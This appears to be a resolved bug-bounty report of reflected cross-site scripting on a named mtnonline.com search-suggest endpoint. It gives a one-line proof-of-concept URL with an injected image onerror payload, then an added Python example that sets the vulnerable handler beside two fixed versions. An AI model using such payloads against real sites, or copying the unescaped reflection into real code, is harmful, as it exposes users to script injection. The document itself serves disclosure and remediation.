XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}
Medium
Vulnerability Details
PoC
```
http://nextapps.mtnonline.com/search/suggest/q/xss<img%20src=x%20onerror=alert()>1337
```
Symbols <'/"> are not filtered, which allows injecting HTML code. The response has content-type: text/html
## Impact
XSS at nextapps.mtnonline.com
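The following is an added example, not code from the report or from the affected application. It models the reported behaviour (the path segment reflected unescaped into a `text/html` response) next to two hardened forms. The handler names, the response wording and the JSON shape are assumptions.

```python
import html
import json
from urllib.parse import unquote

# PoC path segment from the report, used here as test input.
SAMPLE_SEGMENT = "xss<img%20src=x%20onerror=alert()>1337"

def suggest_vulnerable(segment):
    """Reported behaviour: decoded term reflected as-is into text/html."""
    term = unquote(segment)
    headers = {"Content-Type": "text/html; charset=utf-8"}
    return headers, "No suggestions for " + term

def suggest_html_escaped(segment):
    """Fix 1: keep text/html but entity-encode the term before output."""
    term = unquote(segment)
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    # quote=True also encodes " and ', which matters in attribute context.
    return headers, "No suggestions for " + html.escape(term, quote=True)

# Characters rewritten as JSON \u escapes so the body stays inert even if
# something downstream treats it as HTML.
_JSON_ESCAPES = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026", "'": "\\u0027"}

def suggest_json(segment):
    """Fix 2: a suggest endpoint returns data, so serve JSON, not HTML."""
    term = unquote(segment)
    body = json.dumps({"query": term, "suggestions": []})
    for char, escaped in _JSON_ESCAPES.items():
        body = body.replace(char, escaped)
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body

if __name__ == "__main__":
    for handler in (suggest_vulnerable, suggest_html_escaped, suggest_json):
        headers, body = handler(SAMPLE_SEGMENT)
        print(handler.__name__, headers["Content-Type"], body, sep=" | ")
```

The JSON variant still decodes to the original search term on the client, so escaping does not change what the caller receives.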
Report Stats
- Report ID: 1244722
- State: Closed
- Substate: resolved
- Upvotes: 7